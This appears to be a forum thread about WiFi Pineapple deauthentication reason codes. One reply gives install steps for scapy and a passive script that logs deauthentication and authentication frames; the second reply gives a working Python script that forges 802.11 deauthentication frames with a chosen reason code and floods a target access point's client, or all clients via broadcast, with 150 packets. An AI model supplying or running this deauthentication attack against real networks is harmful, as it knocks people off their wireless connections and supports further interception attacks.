Jump to content

Deauthentication reason code


ehem

Recommended Posts

On 3/16/2017 at 2:40 AM, ehem said:

Hi - new to WiFi Pineapple - I need to be able to specify the de-authentication reason code.  Can this be done?

thanks.

This interested me too so had a look around I didn’t see anything to specify them on the pineapple "/pineapple/modules/PineAP/executable/executable" was the closest I came to finding deauth instructions. -  but was able to read them doing the below: -

Found a python script that can do it and it only needed small modification to work.

Install scapy onto pineapple: -

opkg update
opkg upgrade tar wget
opkg install python tcpdump unzip
wget https://github.com/secdev/scapy/archive/v2.4.3rc1.tar.gz
tar -xvf v2.4.3rc1.tar.gz
cd scapy*
python setup.py install
cd ..
rm -rf scapy*

make the authwatch.py - i just used nano and pasted the following into it: -

#!/usr/bin/env python

######################################################
#	authWatch.py v. 0.1 (Quick, Dirty and Loud) - by TinMan
#	Place card in monitor mode and set the channel. 
#	If you want channel hopping, run airodump-ng in 
#	another terminal. Will add channel hopping 
# 	in the next version. 
######################################################	
#
#	Usage: python authWatch.py 
#	

import sys
from scapy.all import *

interface = sys.argv[1]

def sniffReq(p):
     if p.haslayer(Dot11Deauth):
# Look for a deauth packet and print the AP BSSID, Client BSSID and the reason for the deauth.
           print p.sprintf("Deauth Found from AP [%Dot11.addr2%] Client [%Dot11.addr1%], Reason [%Dot11Deauth.reason%]")
# Look for an association request packet and print the Station BSSID, Client BSSID, AP info.
     if p.haslayer(Dot11AssoReq):
           print p.sprintf("Association request from Station [%Dot11.addr1%], Client [%Dot11.addr2%], AP [%Dot11Elt.info%]")
# Look for an authentication packet and print the Client and AP BSSID
     if p.haslayer(Dot11Auth):
	   print p.sprintf("Authentication Request from [%Dot11.addr1%] to AP [%Dot11.addr2%]")
 	   print p.sprintf("------------------------------------------------------------------------------------------")
sniff(iface=interface,prn=sniffReq)

Then to use drop an interface into monitor mode on the channel you wish to watch - example below uses wlan1 and channel 1.

airmon-ng start wlan1 1

***optionally you can run airodump-ng if you want to channel hop, But you will likely miss some packets.

To run the authwatch script

python authwatch.py wlan1mon

I tested this on my Pineapple TETRA and saw when the pineapple deauths clients I get "Reason [unspec]" when I turn off my wifi on my phone I get "Reason [deauth-ST-leaving]".

Seems to work. Hope this helps.

 

authwatcher.py

scappyinstall.sh

Edited by Just_a_User
  • Upvote 1
Link to comment
Share on other sites

thanks  for the reply - very helpful - I had no idea you could install scapy on the pineapple.

Here is a script I wrote in python using scapy to perform a de-auth with a specific reason code.  It takes care of setting the channel, etc... but you have to run airmon-ng check kill and airmon-ng start wlan0 (whatever your interface is).  There are some devices that will behave differently depending on the reason code you send in the de-auth.

Here is a link to a list of the auth and de-auth reason codes and what they all mean/are for.  https://supportforums.cisco.com/document/141136/80211-association-status-80211-deauth-reason-codes

import sys
from scapy.all import *
print "Syntax: deauth.py <BSSID MAC> <Client MAC or ff:ff:ff:ff:ff:ff> <Interface> <channel>"
print "Example: deauth.py 00:aa:33:bb:77:cc 00:aa:44:dd:88:ee wlan0mon 153"
iw="iwconfig "+sys.argv[3]+" channel "+sys.argv[4]
numpackets=150
hitinter = 0.001
print "Setting Channel with "+iw
os.system(iw)
print "Sending deauth as BSSID "+sys.argv[1]+" to client MAC address "+sys.argv[2]+" on channel "+sys.argv[4]
print "On interface "+sys.argv[3]
pkt = RadioTap () / Dot11( addr1 = sys.argv[2], addr2 = sys.argv[1], addr3 = sys.argv[1])/ Dot11Deauth(reason= 7)
sendp(pkt, iface = sys.argv[3], count = numpackets, inter = hitinter)
print "Complete."

 

Edited by ehem
  • Upvote 2
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...